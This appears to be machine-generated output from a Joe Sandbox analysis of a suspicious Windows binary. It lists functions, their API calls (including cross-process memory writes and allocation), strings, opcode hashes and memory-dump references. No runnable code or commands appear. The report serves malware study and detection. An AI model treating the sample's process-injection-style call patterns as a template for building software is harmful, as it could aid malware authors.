                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                              • Instruction ID: 89ca889db6e182335684be5c70bb861e6eb580bba4dac037cc5e94aabc344114
                                              • Opcode Fuzzy Hash: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                              • Instruction Fuzzy Hash: 22010931D06A1ADBCF10AFA8E959AFDFBB8FB09711F40019AE942B3140DFB0555087A6
                                              Function 00BA810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                              • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00BA8141
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                              • Instruction ID: 3d508210f185a69b73c17bd1cba52a68b96073fcd073a212e829c9bd476dcce1
                                              • Opcode Fuzzy Hash: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                              • Instruction Fuzzy Hash: D5F04F71209306AFEB110FA5EC98E777BACFF4A754B040076F986D7150EE719941DA60
                                              Function 00BAC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BAC1F7
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BAC20E
                                              • MessageBeep.USER32(00000000), ref: 00BAC226
                                              • KillTimer.USER32(?,0000040A), ref: 00BAC242
                                              • EndDialog.USER32(?,00000001), ref: 00BAC25C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                              • Instruction ID: 9bb2afc92dd7d7ef74bc07fdc58db34242fb5ebe20644024cfc32bd308bc35e1
                                              • Opcode Fuzzy Hash: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                              • Instruction Fuzzy Hash: 4F01A73050830597EB205B50ED5EBA6BBF8FB01706F0002AAA553914E0DBF0A944CB50
                                              Function 00B513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • EndPath.GDI32(?), ref: 00B513BF
                                              • StrokeAndFillPath.GDI32(?,?,00B8B888,00000000,?), ref: 00B513DB
                                              • SelectObject.GDI32(?,00000000), ref: 00B513EE
                                              • DeleteObject.GDI32 ref: 00B51401
                                              • StrokePath.GDI32(?), ref: 00B5141C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 87aaa66d105584e6f3557aa1b8070836cc5eb1ad891475f498ddea1d7263f31e
                                              • Instruction ID: 32babe898353d879cdd5c37cde2479c19b8ac6be91221b97454e4fa8721bfa68
                                              • Opcode Fuzzy Hash: 87aaa66d105584e6f3557aa1b8070836cc5eb1ad891475f498ddea1d7263f31e
                                              • Instruction Fuzzy Hash: 6CF01D30045609EBEB115F1AEC5C7AC7BE5F742326F08C265E82A4A1F1D7304596DF10
                                              Function 00BA8992 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA899D
                                              • CloseHandle.KERNEL32(?), ref: 00BA89B2
                                              • CloseHandle.KERNEL32(?), ref: 00BA89BA
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA89C3
                                              • HeapFree.KERNEL32(00000000), ref: 00BA89CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                              • String ID:
                                              • API String ID: 3751786701-0
                                              • Opcode ID: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                              • Instruction ID: 341d611e0a86edba22e0d17ebb44c939e63ba326027c6d80f442ddd1d802631c
                                              • Opcode Fuzzy Hash: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                              • Instruction Fuzzy Hash: C7E0C936109002FBDA011FE5EC1C965FF69FB893227108232F21692170DF325420DB50
                                              Function 00BBC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00BBC432
                                              • CoCreateInstance.COMBASE(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBC44A
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • CoUninitialize.COMBASE ref: 00BBC6B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: b32710ddd11a1da3915c2752c43cc73f9b016ae84a39041c4ef8e770f2224ba3
                                              • Instruction ID: 96d25ce5618c715777dba571ad4481e3b629da5d18b50ee6519955c117ffe56d
                                              • Opcode Fuzzy Hash: b32710ddd11a1da3915c2752c43cc73f9b016ae84a39041c4ef8e770f2224ba3
                                              • Instruction Fuzzy Hash: 84A14DB1108205AFD700EF54C891EAFB7E8EF89345F0049ACF5559B1A2DB71E909CB52
                                              Function 00B62CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00B57A51: _memmove.LIBCMT ref: 00B57AAB
                                              • __swprintf.LIBCMT ref: 00B62ECD
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B62D66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: a6e003d1ad53c40f6eabb097a2b6937bd0ca2c6eddbca06a44588cad4b61c288
                                              • Instruction ID: f7a018c85978409d920cc69128658c042c34ab53d4545215014eb1fa21cc26b2
                                              • Opcode Fuzzy Hash: a6e003d1ad53c40f6eabb097a2b6937bd0ca2c6eddbca06a44588cad4b61c288
                                              • Instruction Fuzzy Hash: 40919E712086019FDB14EF24D896D6EB7E8EF85711F0048EDF8559B2A1EB34ED48CB62
                                              Function 00BBB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                              • CoInitialize.OLE32(00000000), ref: 00BBB9BB
                                              • CoCreateInstance.COMBASE(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBB9D4
                                              • CoUninitialize.COMBASE ref: 00BBB9F1
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                              • String ID: .lnk
                                              • API String ID: 2126378814-24824748
                                              • Opcode ID: b816279266d01b4d3e1a3089e711e9018ab3e5a8305a328bc950aeac211ed4a3
                                              • Instruction ID: 366f0ebcb969bbbe5a4274d319f0fae481aecda34b48948335192f71be741723
                                              • Opcode Fuzzy Hash: b816279266d01b4d3e1a3089e711e9018ab3e5a8305a328bc950aeac211ed4a3
                                              • Instruction Fuzzy Hash: F3A166756043019FCB10DF14C894E6ABBE5FF89314F148998F89A9B3A2CB71EC49CB91
                                              Function 00B7501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00B750AD
                                                • Part of subcall function 00B800F0: __87except.LIBCMT ref: 00B8012B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                              • Instruction ID: 31d1a51c79c1af23fe5d4efa5cf1fc56d1fb1c18a15fcc8439d52f06f6a00a47
                                              • Opcode Fuzzy Hash: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                              • Instruction Fuzzy Hash: 84515A2192C60186DB617B24C84536E2BD4EB41790F30CDD9F4E9862B9DFB489D8DB86
                                              Function 00B66192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                              • Instruction ID: b3f22c91f5a50c8d084488386683625b3cd80e936139b3f2b96bb2570f400acd
                                              • Opcode Fuzzy Hash: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                              • Instruction Fuzzy Hash: 2F51A171900305DBDB24DF69C881BAAB7E4EF44304F2085BEE95AD7291E774EA44CB40
                                              Function 00BA97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BB14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA9296,?,?,00000034,00000800,?,00000034), ref: 00BB14E6
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA983F
                                                • Part of subcall function 00BB1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00BB14B1
                                                • Part of subcall function 00BB13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00BB1409
                                                • Part of subcall function 00BB13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB1419
                                                • Part of subcall function 00BB13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB142F
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98AC
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                              • Instruction ID: dd9fc8ce328a927a6e325164ee9a9d4aea107a5927c62c1f26b395bed1f9315b
                                              • Opcode Fuzzy Hash: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                              • Instruction Fuzzy Hash: B7415E76901218BFCB10DFA4CC91AEEBBB8EB4A300F004099FA45B7181DA706E45DFA0
                                              Function 00BD7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BDF910,00000000,?,?,?,?), ref: 00BD79DF
                                              • GetWindowLongW.USER32 ref: 00BD79FC
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD7A0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: a15309a198abc8e252ea6879365d2220ace69ea9a51811b49ac5eb439ca4ff50
                                              • Instruction ID: 5101f1b6e48fde0a9a2a7e80d0997dadb1b46dfb2ea8d3cf988a6908cefe8b82
                                              • Opcode Fuzzy Hash: a15309a198abc8e252ea6879365d2220ace69ea9a51811b49ac5eb439ca4ff50
                                              • Instruction Fuzzy Hash: FA31D032245606AFDB118F38CC55BEABBE9EB05324F244766F875932E0FB34E9508B50
                                              Function 00BD73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BD7461
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BD7475
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD7499
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: d341b71204918a275d8c6e73dd7fe0c8a818b7a24855a2d3fa00c176781f69fb
                                              • Instruction ID: 374f026e74393a4684ad241af2259846ac52cfbbe69f840a0befdebc89360c77
                                              • Opcode Fuzzy Hash: d341b71204918a275d8c6e73dd7fe0c8a818b7a24855a2d3fa00c176781f69fb
                                              • Instruction Fuzzy Hash: 3521B132540219ABDF228E54CC42FEA7BA9EB48724F110155FE156B2D0EAB5AC50CBA0
                                              Function 00BD7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BD7C4A
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BD7C58
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BD7C5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
